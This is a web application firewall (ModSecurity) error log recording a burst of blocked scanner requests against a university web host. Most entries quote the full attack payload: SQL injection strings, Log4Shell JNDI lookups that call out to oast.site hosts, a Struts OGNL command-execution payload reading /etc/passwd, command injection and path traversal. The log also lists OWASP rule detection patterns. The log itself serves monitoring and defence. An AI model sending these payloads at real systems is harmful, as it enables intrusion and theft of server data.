[Tue Aug 29 11:32:06.412727 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xsCo-f0AAAQR4-YAAAAz"]
[Tue Aug 29 11:32:07.302908 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10x8Co-f0AAAQKOeEAAAAs"]
[Tue Aug 29 11:32:08.308250 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10yMCo-f0AAAQOv6gAAAAw"]
[Tue Aug 29 11:32:08.353578 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAP8G4EAAAAV"]
[Tue Aug 29 11:32:10.362457 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg9k3k4ydw7jgq1.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQNwM8AAAAv"]
[Tue Aug 29 11:32:10.443530 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgp3dz65cedip88.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAANsAZEAAAAD"]
[Tue Aug 29 11:32:12.359629 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS_NAMES:ids[0,updatexml(0,concat(0xa,user()),0)]: ids[0,updatexml(0,concat(0xa,user()),0)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10zMCo-f0AAAQNwNgAAAAv"]
[Tue Aug 29 11:32:13.348538 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?>< found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22UTF-8\\x22?><language>$(cat /etc/passwd>webLib/x)</language>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/SDK/webLanguage"] [unique_id "ZO10zcCo-f0AAAQUICYAAAA2"]
[Tue Aug 29 11:32:13.360115 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgiqbt4ax9ofee4.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgiqbt4ax9ofee4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10zcCo-f0AAAQOv7IAAAAw"]
[Tue Aug 29 11:32:15.358833 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:syear. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:syear: 111'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/Side.php"] [unique_id "ZO10z8Co-f0AAAQV4U8AAAA3"]
[Tue Aug 29 11:32:15.391931 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:token: /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/fGh9o.jsp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cas/fileUpload/upload"] [unique_id "ZO10z8Co-f0AAAQUIDAAAAA2"]
[Tue Aug 29 11:32:16.353087 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/author_posts.php"] [unique_id "ZO100MCo-f0AAAQMr1UAAAAu"]
[Tue Aug 29 11:32:16.364895 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "mbkm.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQUIDUAAAA2"]
[Tue Aug 29 11:32:16.364939 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/WebReport/ReportServer"] [unique_id "ZO100MCo-f0AAAQUIDUAAAA2"]
[Tue Aug 29 11:32:17.454510 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:author: admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(999999999),1,1),NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cms/author_posts.php"] [unique_id "ZO100cCo-f0AAAQMr14AAAAu"]
[Tue Aug 29 11:32:18.332347 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQMr2AAAAAu"]
[Tue Aug 29 11:32:18.365479 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQOv8kAAAAw"]
[Tue Aug 29 11:32:21.341994 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQnF@sAAAAF"]
[Tue Aug 29 11:32:21.372874 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAPDoEQAAAAP"]
[Tue Aug 29 11:32:22.503699 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAANsAa4AAAAD"]
[Tue Aug 29 11:32:23.315517 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAANsAbEAAAAD"]
[Tue Aug 29 11:32:23.334881 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAPDoE8AAAAP"]
[Tue Aug 29 11:32:25.359061 2023] [:error] [pid 893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAAN9sWYAAAAJ"]
[Tue Aug 29 11:32:25.365621 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAQnF-wAAAAF"]
[Tue Aug 29 11:32:27.984003 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAARH7HAAAAAM"]
[Tue Aug 29 11:32:28.443207 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAAQ83UwAAAAI"]
[Tue Aug 29 11:32:30.312655 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAARMMboAAAAR"]
[Tue Aug 29 11:32:31.310087 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAARGwdQAAAAL"]
[Tue Aug 29 11:32:32.323815 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARLXu8AAAAQ"]
[Tue Aug 29 11:32:32.323857 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARLXu8AAAAQ"]
[Tue Aug 29 11:32:32.324025 2023] [:error] [pid 880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAANwN1EAAAAb"]
[Tue Aug 29 11:32:35.380017 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg7nnqoao584qd7.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlg7nnqoao584qd7.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlguzfundjb8b73t.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARH7H0AAAAM"]
[Tue Aug 29 11:32:36.364742 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAAPDoHYAAAAP"]
